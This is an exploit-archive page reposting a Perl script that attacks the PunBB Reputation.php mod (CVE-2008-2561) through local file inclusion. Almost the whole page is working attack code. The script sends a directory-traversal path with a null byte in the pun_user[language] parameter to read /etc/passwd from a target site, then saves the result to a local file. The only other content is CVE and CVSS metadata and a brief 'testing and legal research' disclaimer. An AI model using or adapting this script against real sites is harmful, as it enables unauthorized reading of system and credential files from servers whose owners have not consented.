Advertisement






PunBB Reputation.php Mod <= 2.0.4 Local File Inclusion Exploit

CVE Category Price Severity
CVE-2008-2561 CWE-98 Not disclosed High
Author Risk Exploitation Type Date
shAy High Local 2009-08-20
CVSS EPSS EPSSP
CVSS:4.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009080140

Below is a copy:

#!/usr/bin/perl
#[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
#Coded By Dante90, WaRWolFz Crew
#Bug Discovered By: Dante90, WaRWolFz Crew
#register_globals = On
#magic_quotes_gpc = On


use LWP::UserAgent;
use HTTP::Cookies;
use strict;

my $EtcPasswd;
my $TransversalDirectory = "./../../../../"; #Transversal Directory
my $LFI = "etc/passwd"; #File Inject
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link

my $Referrer = "http://www.warwolfz.com/";

my $Cookies = new HTTP::Cookies;
my $UserAgent = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,

cookie_jar => $Cookies,
) or die $!;

sub Local_File_Inclusion{
my ($Directory,$Command) = @_;
return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";

}

my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));

if ($Get->content =~ /No such file or directory in/i){
refresh($HostName, "Exploit Filed");
print " * Error extracting sensible data.\n";

print " * Exploit Failed                                     *\n";
print " ------------------------------------------------------ \n\n";
}else{
$EtcPasswd = $Get->content;
open ( FILE , ">WaRWolFz.html" ) or die $!;

print FILE $EtcPasswd;
close ( FILE );
refresh($HostName, "File Saved");
print " * Exploit Successed                                  *\n";
print " ------------------------------------------------------\n\n";

system("pause");
}

sub usage{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
print " ------------------------------------------------------ \n";

print " * USAGE:                                             *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
print " * perl name_exploit.pl                               *\n";

print " ------------------------------------------------------ \n";
print " *         Powered By Dante90, WaRWolFz Crew          *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";

print " ------------------------------------------------------ \n";
};
exit;
}

sub refresh{
system("cls");
{
print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";

print " ------------------------------------------------------ \n";
print " * USAGE:                                             *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";

print " * perl name_exploit.pl                               *\n";
print " ------------------------------------------------------ \n";
print " *         Powered By Dante90, WaRWolFz Crew          *\n";

print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";

};
print " * Victime Site: " . $_[0] . "\n";
print " * Etc/Passwd: " . $_[1] . "\n";
}

#WaRWolFz



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum